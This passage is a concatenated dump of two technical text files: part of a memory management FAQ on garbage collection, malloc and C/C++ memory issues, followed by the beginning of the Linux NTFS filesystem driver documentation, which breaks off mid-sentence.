allocator to make my program 58 | fast? 59 | + Why can't I just use local data on the stack or in global 60 | variables? 61 | + Why should I worry about virtual memory? Can't I just use as 62 | much memory as I want? 63 | + Why do I need to reset my X server every week? 64 | 65 | C-specific questions 66 | 67 | Can I use garbage collection in C? 68 | 69 | Yes. Various conservative garbage collectors for C exist as add-on 70 | libraries. 71 | 72 | Related terms: C; conservative garbage collection 73 | 74 | Useful websites: 75 | * Boehm-Weiser collector 76 | 77 | 78 | Why do I need to test the return value from malloc? Surely it always 79 | succeeds? 80 | 81 | For small programs, and during light testing, it is true that malloc 82 | usually succeeds. Unfortunately, there are all sorts of unpredictable 83 | reasons why malloc might fail one day; for example: 84 | * Someone uses your program for a far larger data set than you 85 | anticipated; 86 | * Your program is running on a machine with less memory than you 87 | expected; 88 | * The machine your program is running on is heavily loaded. 89 | 90 | In this case, malloc will return NULL, and your program will attempt 91 | to store data by resolving the null pointer. This might cause your 92 | program to exit immediately with a helpful message, but it is more 93 | likely to provoke mysterious problems later on. 94 | 95 | If you want your code to be robust, and to stand the test of time, you 96 | must check all error or status codes that may be returned by functions 97 | you call, especially those in other libraries, such as the C run-time 98 | library. 
99 | 100 | If you really don't want to check the return value from malloc, and 101 | you don't want your program to behave mysteriously when out of memory, 102 | wrap malloc up in something like this: 103 | #include 104 | #include 105 | 106 | void *my_malloc(size_t size) 107 | { 108 | void *p = malloc(size); 109 | 110 | if(p == NULL) { 111 | fputs("Out of memory.\n", stderr); 112 | exit(EXIT_FAILURE); 113 | } 114 | 115 | return p; 116 | } 117 | 118 | Undefined behavior is worth eliminating even in small programs. 119 | 120 | Related terms: malloc 121 | 122 | What's the point of having a garbage collector? Why not use malloc and free? 123 | 124 | Manual memory management, such as malloc and free, forces the 125 | programmer to keep track of which memory is still required, and who is 126 | responsible for freeing it. This works for small programs without 127 | internal interfaces, but becomes a rich source of bugs in larger 128 | programs, and is a serious problem for interface abstraction. 129 | 130 | Automatic memory management frees the programmer from these concerns, 131 | making it easier for him to code in the language of his problem, 132 | rather than the tedious details of the implementation. 133 | 134 | Related terms: garbage collection 135 | 136 | What's wrong with ANSI malloc in the C library? 137 | 138 | malloc provides a very basic manual memory management service. 139 | However, it does not provide the following things, which may be 140 | desirable in your memory manager: 141 | * High performance for specified block sizes; 142 | * Tagged objects; 143 | * Simultaneous frees; 144 | * Locality of reference hints; 145 | * Formatted objects; 146 | * Garbage collection; 147 | * Deallocation of partial blocks; 148 | * Multi-threading without synchronization; 149 | * Inlined allocation code; 150 | * Finalization. 151 | 152 | Many of these can be added on top of malloc, but not with full 153 | performance. 154 | 155 | Related terms: C; malloc 156 | 157 | C++-specific questions 158 | 159 | Can I use garbage collection in C++? 160 | 161 | Yes. The C++ specification has always permitted garbage collection. 162 | Bjarne Stroustrup (C++'s designer) has proposed that this be made 163 | explicit in the standard. There exist various conservative and 164 | semi-conservative garbage collectors for C++. 165 | 166 | Related terms: C++; conservative garbage collection; semi-conservative 167 | garbage collection 168 | 169 | Useful websites: 170 | * Boehm-Weiser collector 171 | 172 | 173 | Why is delete so slow? 174 | 175 | Often delete must perform a more complex task than simply freeing the 176 | memory associated with an object; this is known as finalization. 177 | Finalization typically involves releasing any resources indirectly 178 | associated with the object, such as files that must be closed or 179 | ancillary objects that must be finalized themselves. This may involve 180 | traversing memory that has been unused for some time and hence is 181 | paged out. 182 | 183 | With a manual memory manager (such as new/delete), it is perfectly 184 | possible for the deallocation operation to vary in complexity. Some 185 | systems do quite a lot of processing on freed blocks to coalesce 186 | adjacent blocks, sort free blocks by size (in a buddy system, say), or 187 | sort the free block chain by address. In the last case, deallocating 188 | blocks in address order (or sometimes reverse address order) can 189 | result in poor performance. 
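As a rough sketch (not drawn from any particular allocator) of why
address-ordered freeing can be slow, consider a free list kept sorted by
address: each deallocation must walk the list to find its insertion
point, so a sequence of frees in ascending address order walks further
and further each time.

#include <stddef.h>

struct free_block {
    struct free_block *next;   /* next free block, in address order */
    size_t size;               /* a real allocator tracks block sizes */
};

static struct free_block *free_list;  /* head of the address-ordered list */

void toy_free(struct free_block *blk)
{
    struct free_block **link = &free_list;

    /* Find the first block whose address is above blk. If blocks are
       freed in ascending address order, this scans the whole list on
       every call, giving quadratic behaviour overall. */
    while (*link != NULL && *link < blk)
        link = &(*link)->next;

    blk->next = *link;
    *link = blk;

    /* A real allocator would also try to coalesce blk with its
       neighbours here, which is why it keeps the list address-ordered. */
}

int main(void)
{
    static struct free_block pool[4];
    int i;

    /* Freeing in ascending address order: each call walks further. */
    for (i = 0; i < 4; i++)
        toy_free(&pool[i]);

    return 0;
}
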
190 | 191 | Related terms: deallocation; manual memory management 192 | 193 | What happens if you use class libraries that leak memory? 194 | 195 | In C++, it may be that class libraries expect you to call delete on 196 | objects they create, to invoke the destructor^(2). Check the interface 197 | documentation. 198 | 199 | Failing this, if there is a genuine memory leak in a class library for 200 | which you don't have the source, then the only thing you can try is to 201 | add a garbage collector. The Boehm-Weiser collector will work with 202 | C++. 203 | 204 | Useful websites: 205 | * Boehm-Weiser collector 206 | 207 | 208 | Can't I get all the benefits of garbage collection using C++ constructors and 209 | destructors? 210 | 211 | Carefully designed C++ constructors^(2) and destructors^(2) can go a 212 | long way towards easing the pain of manual memory management. Objects 213 | can know how to deallocate all their associated resources, including 214 | dependent objects (by recursive destruction). This means that clients 215 | of a class library do not need to worry about how to free resources 216 | allocated on their behalf. 217 | 218 | Unfortunately, they still need to worry about when to free such 219 | resources. Unless all objects are allocated for precisely one purpose, 220 | and referred to from just one place (or from within one compound data 221 | structure that will be destroyed atomically), then a piece of code 222 | that has finished with an object cannot determine that it is safe to 223 | call the destructor; it cannot be certain (especially when working 224 | with other people's code) that there is not another piece of code that 225 | will try to use the object subsequently. 226 | 227 | This is where garbage collection has the advantage, because it can 228 | determine when a given object is no longer of interest to anyone (or 229 | at least when there are no more references to it). This neatly avoids 230 | the problems of having multiple copies of the same data or complex 231 | conditional destruction. The program can construct objects and store 232 | references to them anywhere it finds convenient; the garbage collector 233 | will deal with all the problems of data sharing. 234 | 235 | Common objections to garbage collection 236 | 237 | What languages use garbage collection? 238 | 239 | Java, Lisp, Smalltalk, Prolog, ML,... the list goes on. It surprises 240 | many to learn that many implementations of BASIC use GC to manage 241 | character strings efficiently. 242 | 243 | C++ is sometimes characterized as the last holdout against GC, but 244 | this is not accurate. See FAQ: Can I use garbage collection in C++? 245 | for details. 246 | 247 | The notion of automatic memory management has stood the test of time 248 | and is becoming a standard part of modern programming environments. 249 | Some will say "the right tool for the right job", rejecting automatic 250 | memory management in some cases; few today are bold enough to suggest 251 | that there is never a place for GC among tools of the modern 252 | programmer -- either as part of a language or as an add-on component. 253 | 254 | Related terms: garbage collection 255 | 256 | What's the advantage of garbage collection? 257 | 258 | Garbage collection frees you from having to keep track of which part 259 | of your program is responsible for the deallocation of which memory. 
260 | This freedom from tedious and error-prone bookkeeping allows you to 261 | concentrate on the problem you are trying to solve, without 262 | introducing additional problems of implementation. 263 | 264 | This is particularly important in large-scale or highly modular 265 | programs, especially libraries, because the problems of manual memory 266 | management often dominate interface complexity. Additionally, garbage 267 | collection can reduce the amount of memory used because the interface 268 | problems of manual memory management are often solved by creating 269 | extra copies of data. 270 | 271 | In terms of performance, garbage collection is often faster than 272 | manual memory management. It can also improve performance indirectly, 273 | by increasing locality of reference and hence reducing the size of the 274 | working set, and decreasing paging. 275 | 276 | Related terms: garbage collection 277 | 278 | Relevant publications: 279 | * Benjamin Zorn. 1993. The Measured Cost of Conservative Garbage 280 | Collection. 281 | 282 | Programs with GC are huge and bloated; GC isn't suitable for small programs 283 | or systems. 284 | 285 | While it is true that the major advantages of garbage collection are 286 | only seen in complex systems, there is no reason for garbage 287 | collection to introduce any significant overhead at any scale. The 288 | data structures associated with garbage collection compare favorably 289 | in size with those required for manual memory management. 290 | 291 | Some older systems give garbage collection a bad name in terms of 292 | space or time overhead, but many modern techniques exist that make 293 | such overheads a thing of the past. Additionally, some garbage 294 | collectors are designed to work best in certain problem domains, such 295 | as large programs; these may perform poorly outside their target 296 | environment. 297 | 298 | Relevant publications: 299 | * Benjamin Zorn. 1993. The Measured Cost of Conservative Garbage 300 | Collection. 301 | 302 | I can't use GC because I can't afford to have my program pause 303 | 304 | While early garbage collectors had to complete without interruption 305 | and hence would pause observably, many techniques are now available to 306 | ensure that modern collectors can be unobtrusive. 307 | 308 | Related terms: incremental garbage collection; concurrent 309 | 310 | Isn't it much cheaper to use reference counts rather than garbage 311 | collection? 312 | 313 | No, updating reference counts is quite expensive, and they have a 314 | couple of problems: 315 | * They can't cope with cycles; that is, sets of objects that are 316 | referred to only by objects in that set, but that don't have a 317 | zero reference count. 318 | * Reference counting gets more expensive if you have to allow for 319 | the count overflowing. 320 | 321 | There are many systems that use reference counts, and avoid the 322 | problems described above by using a conventional garbage collector to 323 | complement it. This is usually done for real-time benefits. 324 | Unfortunately, experience shows that this is generally less efficient 325 | than implementing a proper real-time garbage collector, except in the 326 | case where most reference counts are one. 327 | 328 | Related terms: reference counting 329 | 330 | Relevant publications: 331 | * David S. Wise. 1993. Stop-and-copy and one-bit reference counting. 332 | 333 | Isn't garbage collection unreliable? I've heard that GCs often kill the 334 | program. 
335 | 336 | Garbage collectors usually have to manipulate vulnerable data 337 | structures and must often use poorly-documented, low-level interfaces. 338 | Additionally, any GC problems may not be detected until some time 339 | later. These factors combine to make most GC bugs severe in effect, 340 | hard to reproduce, and difficult to work around. 341 | 342 | On the other hand, commercial GC code will generally be heavily tested 343 | and widely used, which implies it must be reliable. It will be hard to 344 | match that reliability in a manual memory manager written for one 345 | program, especially given that manual memory management doesn't scale 346 | as well as the automatic variety. 347 | 348 | In addition, bugs in the compiler or run-time (or application if the 349 | language is as low-level as C) can corrupt the heap in ways that only 350 | the GC will detect later. The GC is blamed because the GC found the 351 | corruption. This is a classic case of shooting the messenger. 352 | 353 | I've heard that GC uses twice as much memory. 354 | 355 | This may be true of primitive GCs (like the two-space collector), but 356 | this is not generally true of garbage collection. The data structures 357 | used for GC need be no larger than those for manual memory management. 358 | 359 | Doesn't garbage collection make programs slow? 360 | 361 | No. In The Measured Cost of Conservative Garbage Collection, Zorn 362 | finds that: 363 | 364 | the CPU overhead of conservative garbage collection is comparable 365 | to that of explicit storage management techniques. [...] 366 | Conservative garbage collection performs faster than some explicit 367 | algorithms and slower than others, the relative performance being 368 | largely dependent on the program. 369 | 370 | Note also that the version of the conservative collector used in this 371 | paper is now rather old and the collector has been much improved since 372 | then. 373 | 374 | Relevant publications: 375 | * Benjamin Zorn. 1993. The Measured Cost of Conservative Garbage 376 | Collection. 377 | 378 | Manual memory management gives me control -- it doesn't pause. 379 | 380 | It is possible for manual memory management to pause for considerable 381 | periods, either on allocation or deallocation. It certainly gives no 382 | guarantees about performance, in general. 383 | 384 | With automatic memory management, such as garbage collection, modern 385 | techniques can give guarantees about interactive pause times, and so 386 | on. 387 | 388 | Related terms: incremental garbage collection; concurrent 389 | 390 | Miscellaneous 391 | 392 | Why does my disk rattle so much? 393 | 394 | When you are using a virtual memory^(1) system, the computer may have 395 | to fetch pages of memory from disk before they can be accessed. If the 396 | total working set of your active programs exceeds the physical 397 | memory^(1) available, paging will happen continually, your disk will 398 | rattle, and performance will degrade significantly. The only solutions 399 | are to install more physical memory, run fewer programs at the same 400 | time, or tune the memory requirements of your programs. 401 | 402 | The problem is aggravated because virtual memory systems approximate 403 | the theoretical working set with the set of pages on which the working 404 | set lies. If the actual working set is spread out onto a large number 405 | of pages, then the working page-set is large. 
406 | 407 | When objects that refer to each other are distant in memory, this is 408 | known as poor locality of reference. This happens either because the 409 | program's designer did not worry about this, or the memory manager 410 | used in the program doesn't permit the designer to do anything about 411 | it. 412 | 413 | Note that a copying garbage collector can dynamically organize your 414 | data according to the program's reference patterns and thus mitigate 415 | this problem. 416 | 417 | Related terms: thrash 418 | 419 | Relevant publications: 420 | * P. J. Denning. 1968. Thrashing: Its Causes and Prevention. 421 | 422 | Where can I find out more about garbage collection? 423 | 424 | Many modern languages have garbage collection built in, and the 425 | language documentation should give details. For some other languages, 426 | garbage collection can be added, see the Boehm-Weiser collector for an 427 | example of a C/C++ addition. See also The Garbage Collection FAQ. 428 | 429 | Related terms: garbage collection 430 | 431 | Relevant publications: 432 | * Paul R. Wilson. 1994. Uniprocessor Garbage Collection Techniques. 433 | * Richard E. Jones, Rafael Lins. 1996. Garbage Collection: 434 | Algorithms for Automatic Dynamic Memory Management. 435 | 436 | Where can I get a garbage collector? 437 | 438 | The Boehm-Weiser collector is suitable for C or C++. The best way to 439 | get a garbage collector, however, is to program in a language that 440 | provides garbage collection. 441 | 442 | Related terms: garbage collection 443 | 444 | Useful websites: 445 | * The Garbage Collection FAQ 446 | 447 | 448 | Why does my program use so much memory? 449 | 450 | If you are using manual memory management (for example, malloc and 451 | free in C), it is likely that your program is failing to free memory 452 | blocks after it stops using them. When your code allocates memory on 453 | the heap, there is an implied responsibility to free that memory. If a 454 | function uses heap memory for returning data, you must decide who 455 | takes on that responsibility. Pay special attention to the interfaces 456 | between functions and modules. Remember to check what happens to 457 | allocated memory in the event of an error or an exception. 458 | 459 | If you are using automatic memory management (almost certainly garbage 460 | collection), it is probable that your code is remembering some blocks 461 | that it will never use in future. This is known as the difference 462 | between liveness and reachability. Consider clearing variables that 463 | refer to large blocks or networks of blocks, when the data structure 464 | is no longer required. 465 | 466 | I use a library, and my program grows every time I call it. Why? 467 | 468 | If you are using manual memory management, it is likely that the 469 | library is allocating data structures on the heap every time it is 470 | used, but that they are not being freed. Check the interface 471 | documentation for the library; it may expect you to take some action 472 | when you have finished with returned data. It may be necessary to 473 | close down the library and re-initialize it to recover allocated 474 | memory. 475 | 476 | Unfortunately, it is all too possible that the library has a memory 477 | management bug. In this case, unless you have the source code, there 478 | is little you can do except report the problem to the supplier. It may 479 | be possible to add a garbage collector to your language, and this 480 | might solve your problems. 
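
To make the manual memory management case above concrete, here is a minimal C
sketch (the library function is hypothetical, purely for illustration): every
call that hands back heap-allocated data needs a matching free, including on
error paths, or the program grows on every call.

    #include <stdio.h>
    #include <stdlib.h>

    /* Stand-in for a library call that returns heap-allocated data.
       The caller takes on the responsibility of freeing the result. */
    char *lib_get_record(const char *key)
    {
        char *buf = malloc(64);
        if (buf == NULL)
            return NULL;
        snprintf(buf, 64, "record for %s", key);
        return buf;
    }

    int main(void)
    {
        int i;
        for (i = 0; i < 1000; i++) {
            char *rec = lib_get_record("example");
            if (rec == NULL)
                continue;   /* nothing was allocated on this path */
            puts(rec);
            free(rec);      /* omit this and the program grows on every call */
        }
        return 0;
    }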
481 | 482 | With a garbage collector, sometimes objects are retained because there 483 | is a reference to them from some global data structure. Although the 484 | library might not make any further use of the objects, the collector 485 | must retain the objects because they are still reachable. 486 | 487 | If you know that a particular reference will never be used in future, 488 | it can be worthwhile to overwrite it. This means that the collector 489 | will not retain the referred object because of that reference. Other 490 | references to the same object will keep it alive, so your program 491 | doesn't need to determine whether the object itself will ever be 492 | accessed in future. This should be done judiciously, using the garbage 493 | collector's tools to find what objects are being retained and why. 494 | 495 | If your garbage collector is generational, it is possible that you are 496 | suffering from premature tenuring, which can often be solved by tuning 497 | the collector or using a separate memory area for the library. 498 | 499 | Related terms: memory leak; premature tenuring 500 | 501 | Should I write my own memory allocator to make my program fast? 502 | 503 | If you are sure that your program is spending a large proportion of 504 | its time in memory management, and you know what you're doing, then it 505 | is certainly possible to improve performance by writing a 506 | suballocator. On the other hand, advances in memory management 507 | technology make it hard to keep up with software written by experts. 508 | In general, improvements to memory management don't make as much 509 | difference to performance as improvements to the program algorithms. 510 | 511 | In The Measured Cost of Conservative Garbage Collection, Zorn finds: 512 | 513 | In four of the programs investigated, the programmer felt compelled 514 | to avoid using the general-purpose storage allocator by writing 515 | type-specific allocation routines for the most common object types 516 | in the program. [...] The general conclusion [...] is that 517 | programmer optimizations in these programs were mostly unnecessary. 518 | [...] simply using a different algorithm appears to improve the 519 | performance even more. 520 | 521 | and concludes: 522 | 523 | programmers, instead of spending time writing domain-specific 524 | storage allocators, should consider using other publicly-available 525 | implementations of storage management algorithms if the one they 526 | are using performs poorly. 527 | 528 | Relevant publications: 529 | * Benjamin Zorn. 1993. The Measured Cost of Conservative Garbage 530 | Collection. 531 | 532 | Why can't I just use local data on the stack or in global variables? 533 | 534 | Global, or static, data is fixed size; it cannot grow in response to 535 | the size or complexity of the data set received by a program. 536 | Stack-allocated data doesn't exist once you leave the function (or 537 | program block) in which it was declared. 538 | 539 | If your program's memory requirements are entirely predictable and 540 | fixed at compile-time, or you can structure your program to rely on 541 | stack data only while it exists, then you can entirely avoid using 542 | heap allocation. Note that, with some compilers, use of large global 543 | memory blocks can bloat the object file size. 
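
As a minimal C sketch of the three alternatives discussed here (the function
and sizes are invented for illustration): static data is fixed at compile
time, stack data disappears with its function, and heap data can be sized to
the data set but must be freed explicitly.

    #include <stdio.h>
    #include <stdlib.h>

    static int table[1024];      /* static allocation: size fixed when compiled */

    void worker(int n)
    {
        int scratch[64];         /* stack allocation: gone when worker() returns */
        int *grown;

        grown = malloc(n * sizeof(int));  /* heap allocation: sized to the data set */
        if (grown == NULL)
            return;

        scratch[0] = table[0] = grown[0] = n;
        printf("%d %d %d\n", scratch[0], table[0], grown[0]);
        free(grown);             /* heap memory must be released explicitly */
    }

    int main(void)
    {
        worker(100000);
        return 0;
    }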
544 | 545 | It may often seem simpler to allocate a global block that seems 546 | "probably large enough" for any plausible data set, but this 547 | simplification will almost certainly cause trouble sooner or later. 548 | 549 | Related terms: stack allocation; heap allocation; static allocation 550 | 551 | Why should I worry about virtual memory? Can't I just use as much memory as I 552 | want? 553 | 554 | While virtual memory can greatly increase your capacity to store data, 555 | there are three problems typically experienced with it: 556 | * It does not provide an unlimited amount of memory. In particular, 557 | all memory that you actually allocate (as opposed to reserve) has 558 | to be stored somewhere. Usually you must have disk space available 559 | for all pages containing allocated memory. In a few systems, you 560 | can subtract the available physical memory from the disk space 561 | required. If the memory contains images of program or data files, 562 | then file mapping, or assigning existing files to regions of the 563 | virtual address space, can help considerably. 564 | * In most computers, there is a large difference in speed between 565 | main memory and disk; running a program with a working set that 566 | does not fit in physical memory almost always results in 567 | unacceptable performance. 568 | * An additional problem with using unnecessary quantities of memory 569 | is that poor locality of reference can result in heavy paging. 570 | 571 | Related terms: virtual memory^(1); thrash 572 | 573 | Why do I need to reset my X server every week? 574 | 575 | Some X servers are notorious for leaking memory. This is probably 576 | because the sheer complexity of the X library interface, together with 577 | those for toolkits such as Motif, makes manual memory management a 578 | nightmare for the programmer. 579 | 580 | There have been reports of successful use of the Boehm-Weiser 581 | collector with X servers. 582 | 583 | Related terms: memory leak 584 | -------------------------------------------------------------------------------- /ntfs.txt: -------------------------------------------------------------------------------- 1 | The Linux NTFS filesystem driver 2 | ================================ 3 | 4 | 5 | Table of contents 6 | ================= 7 | 8 | - Overview 9 | - Web site 10 | - Features 11 | - Supported mount options 12 | - Known bugs and (mis-)features 13 | - Using NTFS volume and stripe sets 14 | - The Device-Mapper driver 15 | - The Software RAID / MD driver 16 | - Limitations when using the MD driver 17 | - ChangeLog 18 | 19 | 20 | Overview 21 | ======== 22 | 23 | Linux-NTFS comes with a number of user-space programs known as ntfsprogs. 24 | These include mkntfs, a full-featured ntfs filesystem format utility, 25 | ntfsundelete used for recovering files that were unintentionally deleted 26 | from an NTFS volume and ntfsresize which is used to resize an NTFS partition. 27 | See the web site for more information. 28 | 29 | To mount an NTFS 1.2/3.x (Windows NT4/2000/XP/2003) volume, use the file 30 | system type 'ntfs'. The driver currently supports read-only mode (with no 31 | fault-tolerance, encryption or journalling) and very limited, but safe, write 32 | support. 33 | 34 | For fault tolerance and raid support (i.e. volume and stripe sets), you can 35 | use the kernel's Software RAID / MD driver. See section "Using Software RAID 36 | with NTFS" for details. 
37 | 38 | 39 | Web site 40 | ======== 41 | 42 | There is plenty of additional information on the linux-ntfs web site 43 | at http://www.linux-ntfs.org/ 44 | 45 | The web site has a lot of additional information, such as a comprehensive 46 | FAQ, documentation on the NTFS on-disk format, information on the Linux-NTFS 47 | userspace utilities, etc. 48 | 49 | 50 | Features 51 | ======== 52 | 53 | - This is a complete rewrite of the NTFS driver that used to be in the 2.4 and 54 | earlier kernels. This new driver implements NTFS read support and is 55 | functionally equivalent to the old ntfs driver and it also implements limited 56 | write support. The biggest limitation at present is that files/directories 57 | cannot be created or deleted. See below for the list of write features that 58 | are so far supported. Another limitation is that writing to compressed files 59 | is not implemented at all. Also, neither read nor write access to encrypted 60 | files is so far implemented. 61 | - The new driver has full support for sparse files on NTFS 3.x volumes which 62 | the old driver isn't happy with. 63 | - The new driver supports execution of binaries due to mmap() now being 64 | supported. 65 | - The new driver supports loopback mounting of files on NTFS which is used by 66 | some Linux distributions to enable the user to run Linux from an NTFS 67 | partition by creating a large file while in Windows and then loopback 68 | mounting the file while in Linux and creating a Linux filesystem on it that 69 | is used to install Linux on it. 70 | - A comparison of the two drivers using: 71 | time find . -type f -exec md5sum "{}" \; 72 | run three times in sequence with each driver (after a reboot) on a 1.4GiB 73 | NTFS partition, showed the new driver to be 20% faster in total time elapsed 74 | (from 9:43 minutes on average down to 7:53). The time spent in user space 75 | was unchanged but the time spent in the kernel was decreased by a factor of 76 | 2.5 (from 85 CPU seconds down to 33). 77 | - The driver does not support short file names in general. For backwards 78 | compatibility, we implement access to files using their short file names if 79 | they exist. The driver will not create short file names however, and a 80 | rename will discard any existing short file name. 81 | - The new driver supports exporting of mounted NTFS volumes via NFS. 82 | - The new driver supports async io (aio). 83 | - The new driver supports fsync(2), fdatasync(2), and msync(2). 84 | - The new driver supports readv(2) and writev(2). 85 | - The new driver supports access time updates (including mtime and ctime). 86 | - The new driver supports truncate(2) and open(2) with O_TRUNC. But at present 87 | only very limited support for highly fragmented files, i.e. ones which have 88 | their data attribute split across multiple extents, is included. Another 89 | limitation is that at present truncate(2) will never create sparse files, 90 | since to mark a file sparse we need to modify the directory entry for the 91 | file and we do not implement directory modifications yet. 92 | - The new driver supports write(2) which can both overwrite existing data and 93 | extend the file size so that you can write beyond the existing data. Also, 94 | writing into sparse regions is supported and the holes are filled in with 95 | clusters. But at present only limited support for highly fragmented files, 96 | i.e. ones which have their data attribute split across multiple extents, is 97 | included. 
Another limitation is that write(2) will never create sparse 98 | files, since to mark a file sparse we need to modify the directory entry for 99 | the file and we do not implement directory modifications yet. 100 | 101 | Supported mount options 102 | ======================= 103 | 104 | In addition to the generic mount options described by the manual page for the 105 | mount command (man 8 mount, also see man 5 fstab), the NTFS driver supports the 106 | following mount options: 107 | 108 | iocharset=name Deprecated option. Still supported but please use 109 | nls=name in the future. See description for nls=name. 110 | 111 | nls=name Character set to use when returning file names. 112 | Unlike VFAT, NTFS suppresses names that contain 113 | unconvertible characters. Note that most character 114 | sets contain insufficient characters to represent all 115 | possible Unicode characters that can exist on NTFS. 116 | To be sure you are not missing any files, you are 117 | advised to use nls=utf8 which is capable of 118 | representing all Unicode characters. 119 | 120 | utf8= Option no longer supported. Currently mapped to 121 | nls=utf8 but please use nls=utf8 in the future and 122 | make sure utf8 is compiled either as module or into 123 | the kernel. See description for nls=name. 124 | 125 | uid= 126 | gid= 127 | umask= Provide default owner, group, and access mode mask. 128 | These options work as documented in mount(8). By 129 | default, the files/directories are owned by root and 130 | he/she has read and write permissions, as well as 131 | browse permission for directories. No one else has any 132 | access permissions. I.e. the mode on all files is by 133 | default rw------- and for directories rwx------, a 134 | consequence of the default fmask=0177 and dmask=0077. 135 | Using a umask of zero will grant all permissions to 136 | everyone, i.e. all files and directories will have mode 137 | rwxrwxrwx. 138 | 139 | fmask= 140 | dmask= Instead of specifying umask which applies both to 141 | files and directories, fmask applies only to files and 142 | dmask only to directories. 143 | 144 | sloppy= If sloppy is specified, ignore unknown mount options. 145 | Otherwise the default behaviour is to abort mount if 146 | any unknown options are found. 147 | 148 | show_sys_files= If show_sys_files is specified, show the system files 149 | in directory listings. Otherwise the default behaviour 150 | is to hide the system files. 151 | Note that even when show_sys_files is specified, "$MFT" 152 | will not be visible due to bugs/mis-features in glibc. 153 | Further, note that irrespective of show_sys_files, all 154 | files are accessible by name, i.e. you can always do 155 | "ls -l \$UpCase" for example to specifically show the 156 | system file containing the Unicode upcase table. 157 | 158 | case_sensitive= If case_sensitive is specified, treat all file names as 159 | case sensitive and create file names in the POSIX 160 | namespace. Otherwise the default behaviour is to treat 161 | file names as case insensitive and to create file names 162 | in the WIN32/LONG name space. Note, the Linux NTFS 163 | driver will never create short file names and will 164 | remove them on rename/delete of the corresponding long 165 | file name. 166 | Note that files remain accessible via their short file 167 | name, if it exists. If case_sensitive, you will need 168 | to provide the correct case of the short file name. 169 | 170 | disable_sparse= If disable_sparse is specified, creation of sparse 171 | regions, i.e. 
holes, inside files is disabled for the 172 | volume (for the duration of this mount only). By 173 | default, creation of sparse regions is enabled, which 174 | is consistent with the behaviour of traditional Unix 175 | filesystems. 176 | 177 | errors=opt What to do when critical filesystem errors are found. 178 | Following values can be used for "opt": 179 | continue: DEFAULT, try to clean-up as much as 180 | possible, e.g. marking a corrupt inode as 181 | bad so it is no longer accessed, and then 182 | continue. 183 | recover: At present only supported is recovery of 184 | the boot sector from the backup copy. 185 | If read-only mount, the recovery is done 186 | in memory only and not written to disk. 187 | Note that the options are additive, i.e. specifying: 188 | errors=continue,errors=recover 189 | means the driver will attempt to recover and if that 190 | fails it will clean-up as much as possible and 191 | continue. 192 | 193 | mft_zone_multiplier= Set the MFT zone multiplier for the volume (this 194 | setting is not persistent across mounts and can be 195 | changed from mount to mount but cannot be changed on 196 | remount). Values of 1 to 4 are allowed, 1 being the 197 | default. The MFT zone multiplier determines how much 198 | space is reserved for the MFT on the volume. If all 199 | other space is used up, then the MFT zone will be 200 | shrunk dynamically, so this has no impact on the 201 | amount of free space. However, it can have an impact 202 | on performance by affecting fragmentation of the MFT. 203 | In general use the default. If you have a lot of small 204 | files then use a higher value. The values have the 205 | following meaning: 206 | Value MFT zone size (% of volume size) 207 | 1 12.5% 208 | 2 25% 209 | 3 37.5% 210 | 4 50% 211 | Note this option is irrelevant for read-only mounts. 212 | 213 | 214 | Known bugs and (mis-)features 215 | ============================= 216 | 217 | - The link count on each directory inode entry is set to 1, due to Linux not 218 | supporting directory hard links. This may well confuse some user space 219 | applications, since the directory names will have the same inode numbers. 220 | This also speeds up ntfs_read_inode() immensely. And we haven't found any 221 | problems with this approach so far. If you find a problem with this, please 222 | let us know. 223 | 224 | 225 | Please send bug reports/comments/feedback/abuse to the Linux-NTFS development 226 | list at sourceforge: linux-ntfs-dev[AT]lists.sourceforge[DOT]net 227 | 228 | 229 | Using NTFS volume and stripe sets 230 | ================================= 231 | 232 | For support of volume and stripe sets, you can either use the kernel's 233 | Device-Mapper driver or the kernel's Software RAID / MD driver. The former is 234 | the recommended one to use for linear raid. But the latter is required for 235 | raid level 5. For striping and mirroring, either driver should work fine. 236 | 237 | 238 | The Device-Mapper driver 239 | ------------------------ 240 | 241 | You will need to create a table of the components of the volume/stripe set and 242 | how they fit together and load this into the kernel using the dmsetup utility 243 | (see man 8 dmsetup). 244 | 245 | Linear volume sets, i.e. linear raid, has been tested and works fine. Even 246 | though untested, there is no reason why stripe sets, i.e. raid level 0, and 247 | mirrors, i.e. raid level 1 should not work, too. Stripes with parity, i.e. 
248 | raid level 5, unfortunately cannot work yet because the current version of the 249 | Device-Mapper driver does not support raid level 5. You may be able to use the 250 | Software RAID / MD driver for raid level 5, see the next section for details. 251 | 252 | To create the table describing your volume you will need to know each of its 253 | components and their sizes in sectors, i.e. multiples of 512-byte blocks. 254 | 255 | For NT4 fault tolerant volumes you can obtain the sizes using fdisk. So for 256 | example if one of your partitions is /dev/hda2 you would do: 257 | 258 | $ fdisk -ul /dev/hda 259 | 260 | Disk /dev/hda: 81.9 GB, 81964302336 bytes 261 | 255 heads, 63 sectors/track, 9964 cylinders, total 160086528 sectors 262 | Units = sectors of 1 * 512 = 512 bytes 263 | 264 | Device Boot Start End Blocks Id System 265 | /dev/hda1 * 63 4209029 2104483+ 83 Linux 266 | /dev/hda2 4209030 37768814 16779892+ 86 NTFS 267 | /dev/hda3 37768815 46170809 4200997+ 83 Linux 268 | 269 | And you would know that /dev/hda2 has a size of 37768814 - 4209030 + 1 = 270 | 33559785 sectors. 271 | 272 | For Win2k and later dynamic disks, you can for example use the ldminfo utility 273 | which is part of the Linux LDM tools (the latest version at the time of 274 | writing is linux-ldm-0.0.8.tar.bz2). You can download it from: 275 | http://www.linux-ntfs.org/ 276 | Simply extract the downloaded archive (tar xvjf linux-ldm-0.0.8.tar.bz2), go 277 | into it (cd linux-ldm-0.0.8) and change to the test directory (cd test). You 278 | will find the precompiled (i386) ldminfo utility there. NOTE: You will not be 279 | able to compile this yourself easily so use the binary version! 280 | 281 | Then you would use ldminfo in dump mode to obtain the necessary information: 282 | 283 | $ ./ldminfo --dump /dev/hda 284 | 285 | This would dump the LDM database found on /dev/hda which describes all of your 286 | dynamic disks and all the volumes on them. At the bottom you will see the 287 | VOLUME DEFINITIONS section which is all you really need. You may need to look 288 | further above to determine which of the disks in the volume definitions is 289 | which device in Linux. Hint: Run ldminfo on each of your dynamic disks and 290 | look at the Disk Id close to the top of the output for each (the PRIVATE HEADER 291 | section). You can then find these Disk Ids in the VBLK DATABASE section in the 292 | components where you will get the LDM Name for the disk that is found in 293 | the VOLUME DEFINITIONS section. 294 | 295 | Note you will also need to enable the LDM driver in the Linux kernel. If your 296 | distribution did not enable it, you will need to recompile the kernel with it 297 | enabled. This will create the LDM partitions on each device at boot time. You 298 | would then use those devices (for /dev/hda they would be /dev/hda1, 2, 3, etc) 299 | in the Device-Mapper table. 300 | 301 | You can also bypass using the LDM driver by 